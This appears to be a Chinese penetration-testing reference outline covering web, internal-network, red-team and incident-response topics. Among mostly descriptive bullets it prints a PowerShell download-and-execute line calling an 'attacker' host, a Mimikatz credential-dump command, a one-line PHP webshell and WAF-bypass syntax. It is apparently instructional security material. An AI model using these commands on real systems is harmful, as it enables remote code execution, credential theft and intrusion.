专注Web及移动安全[红日安全74期]
字数 1750 2025-08-18 11:37:57
Web及移动安全渗透测试技术文档
一、渗透测试方法论
1.1 渗透测试范围界定
- 明确测试边界:内部网络/外部网络/特定应用
- 确定测试类型:黑盒/白盒/灰盒测试
- 制定测试规则:时间窗口、攻击强度限制
1.2 渗透测试流程
-
信息收集阶段
- 目标识别:域名、IP范围、网络拓扑
- 技术栈识别:Web框架、服务器类型、编程语言
- 开放服务扫描:端口、服务版本识别
-
漏洞分析阶段
- 自动化扫描工具使用
- 手动验证潜在漏洞
- 业务逻辑漏洞分析
-
攻击利用阶段
- 权限提升技术
- 横向移动方法
- 数据窃取/篡改验证
-
后渗透阶段
- 持久化访问建立
- 痕迹清理
- 报告撰写
二、Web安全技术
2.1 WAF研究与绕过
- 开源WAF研究:ModSecurity核心规则分析
- 常见绕过技术:
- 编码混淆:Hex/Unicode/Base64
- 协议层面:HTTP参数污染
- 时间延迟攻击
- 注释干扰:
/*!50000SELECT*/
2.2 业务逻辑漏洞
-
活动类漏洞:
- 重复领取优惠券
- 抽奖次数篡改
- 价格参数篡改
- 时间条件竞争
-
密码重置漏洞:
- 验证码爆破
- 响应包分析
- 邮箱/手机号篡改
- Token预测
2.3 高级Web攻击
-
WinRAR目录穿越漏洞(CVE-2018-20250):
- 利用原理:ACE文件头欺骗
- 攻击载荷:恶意DLL写入启动目录
- 防御措施:升级至5.70 beta 1版本
-
水平越权案例:
- 用户ID枚举
- 未授权API访问
- 批量操作漏洞
三、内网渗透技术
3.1 主机发现技术
-
ARP扫描:
arp-scan -l- Nmap ARP扫描:
nmap -PR -sn 192.168.1.0/24
-
UDP扫描:
- UDP端口探测:
nmap -sU -p 53,161,137 192.168.1.1 - 响应分析:ICMP不可达判断存活
- UDP端口探测:
3.2 横向移动技术
-
工作组环境渗透:
- NetBIOS名称欺骗
- LLMNR/NBT-NS投毒
- SMB共享爆破
-
权限提升方法:
- 服务配置错误利用
- 计划任务劫持
- 凭证转储(LSASS/Mimikatz)
3.3 三层网络渗透
-
网络拓扑架构:
- DMZ区突破
- 双网卡主机跳板
- VLAN跳跃攻击
-
MSF内网穿透:
# 路由添加 route add 10.10.10.0 255.255.255.0 1 # Socks代理建立 use auxiliary/server/socks_proxy
四、安全工具集
4.1 扫描类工具
-
Angry IP Scanner:
- 多线程主机发现
- 自定义端口扫描
- 结果导出功能
-
Arachni Web扫描器:
arachni http://example.com --checks=sql_injection,xss arachni_reporter report.afr --report=html:outfile=report.html
4.2 密码破解工具
- CeWL单词生成器:
cewl -d 2 -m 5 -w dict.txt https://example.com- 参数说明:
-d:爬取深度-m:最小单词长度-w:输出文件
- 参数说明:
4.3 BurpSuite插件
- Turbo Intruder:
- 高性能爆破引擎
- 自定义攻击脚本
- 流量分析优化
五、应急响应
5.1 Linux应急事件
-
挖矿病毒处置:
- 异常进程排查:
top/ps auxf - 定时任务检查:
crontab -l - 网络连接分析:
netstat -antp
- 异常进程排查:
-
DDOS防御:
- iptables限速:
iptables -A INPUT -p tcp --dport 80 -m limit --limit 25/minute --limit-burst 100 -j ACCEPT
- iptables限速:
5.2 Windows日志分析
- 安全事件ID:
- 4624:登录成功
- 4625:登录失败
- 4672:特权登录
- 4688:进程创建
六、红队技术
6.1 攻击思维框架
-
ATT&CK矩阵应用:
- 初始访问:鱼叉攻击/漏洞利用
- 执行:命令行/Powershell
- 持久化:注册表/服务创建
-
隐蔽通信:
- DNS隧道:
dnscat2 - HTTP伪装:C2 over HTTPS
- 合法云服务滥用
- DNS隧道:
6.2 Powershell利用
- 常用模块:
# 内存加载脚本 IEX (New-Object Net.WebClient).DownloadString('http://attacker/script.ps1') # 凭证提取 Invoke-Mimikatz -DumpCreds
七、漏洞管理
7.1 CNNVD漏洞月报
-
漏洞趋势分析:
- Web应用漏洞占比
- 移动端漏洞增长
- 物联网设备漏洞
-
补丁管理策略:
- 关键漏洞72小时修复
- 漏洞扫描验证流程
- 虚拟补丁应用
附录:实战案例
案例1:服务器入侵溯源
- Webshell发现:
eval($_POST['cmd']) - 日志分析:异常登录IP
- 攻击路径重建:SQLi→RCE→提权
案例2:水平越权导致批量改密
- 漏洞点:
/api/user/update?uid=123 - 利用方式:遍历uid参数
- 修复方案:会话绑定用户ID
本技术文档基于红日安全第74期内容整理,涵盖Web及移动安全核心知识点,可作为渗透测试参考手册使用。实际测试中请遵守法律法规,获取授权后进行。